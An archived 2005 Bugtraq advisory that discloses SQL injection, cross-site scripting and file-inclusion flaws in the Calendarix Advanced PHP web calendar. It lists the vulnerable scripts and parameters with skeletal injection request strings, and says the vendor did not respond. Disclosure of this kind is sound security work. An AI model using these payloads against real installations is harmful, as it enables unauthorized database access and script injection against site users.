lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b49eb6fe05053110226ad168a9@mail.gmail.com>
Date: Tue, 31 May 2005 12:22:16 -0500
From: DarkBicho <darkbicho@...il.com>
To: bugtraq@...urityfocus.com
Subject: multiple vulnerability Calendarix Advanced


/***********************************************
* Advisorie : 01-0005-15
* title: multiple vulnerability
* Software: Calendarix Advanced 
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/


- Affected software description:

Webcalendar is a web software write in php y mysql 

- Expoit:

	Include 

	line 16 
	admin/cal_admintop.php:include_once ($calpath."cal_utils.php");

	xss and sql injection

	line 122 - 160
	cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
	cal_pophols.php?id=999'[sql]/*	
	line 23
	calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
	line 194 - 196
	cal_week.php?op=week&catview= 999'[sql]/*
	line 34 - 39
	cal_cat.php?op=cats&catview=999'[sql]*/


- How to fix:

	Vendor no responds

- Credits:

	DarkBicho
	Email: darkbicho@...il.com
	Web: http://www.swp-scene.org


- Grettings:
	"A mi Team SWP"
	" Viva el Peru Carajo"

-- 
- - - - - - - - - - - - - - - - - - - - - - - - - 
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team :  http://www.swp-scene.org/
Made in Peru
- - - - - - - - - - - - - - - - - - - - - - - - -


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ